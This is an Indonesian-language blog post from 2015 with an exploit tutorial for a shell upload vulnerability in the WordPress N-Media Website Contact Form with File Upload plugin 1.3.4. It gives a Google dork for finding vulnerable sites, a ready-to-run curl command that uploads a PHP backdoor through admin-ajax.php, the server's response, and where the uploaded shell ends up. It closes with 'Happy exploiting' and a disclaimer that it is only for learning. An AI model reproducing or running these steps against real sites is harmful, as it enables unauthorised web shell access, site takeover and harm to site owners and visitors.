Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
Senin, 13 April 2015
Add Comment
Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4
Shell Upload Vulnerability - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4
Shell Upload Vulnerability, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.
Sumber http://noob1t4.blogspot.com/
Sekian Artikel Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability.
Oke lama ya tidak membahas exploit web . Hehehe. barusan buka 1337day dan kebetulan ada exploit yang baru dirilis. Nama nya Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability . Langsung saja ke tutorial ya :
Google Dorks :
intitle: index of /uploads/contact_files/
– use your brain, bitch !
Shell location :
http://victim/wp-content/uploads/contact_files/backdoor.php
Tested on :
BackBox Linux
Anggap sudah meneumuakn target.
Sekarang masuk terminal linux.
jackwilder@suckseed % mkdir exp
jackwilder@suckseed % cd exp
Kita membuat folder exp dan masuk ke direktori tersebut .
Lalu kita masukkan backdoor kita disitu.
Misalkan saya membuat backdoor x.php di folder exp tadi.
Lalu masukkan command berikut :
curl -k -X POST -F “action=upload” -F “Filedata=@./[backdoor.php]” -F “action=nm_webcontact_upload_file” http://target/wp-admin/admin-ajax.php
Contoh :
Disana tertulis :
{“status”:”uploaded”,”filename”:”1428981565-x.php“}%
Maka shell akan berada di :
http://localhost/bugs/wp-content/uploads/contact_files/1428981565-x.php
http://localhost/bugs/wp-content/uploads/contact_files/1428981565-x.php
Sekian dan semoga bermanfaat .
Happy exploiting 🙂
Sumber http://noob1t4.blogspot.com/
Sekian Artikel Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability.
Terima kasih telah membaca artikel Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4
Shell Upload Vulnerability, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini
0 Response to "Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability"
Posting Komentar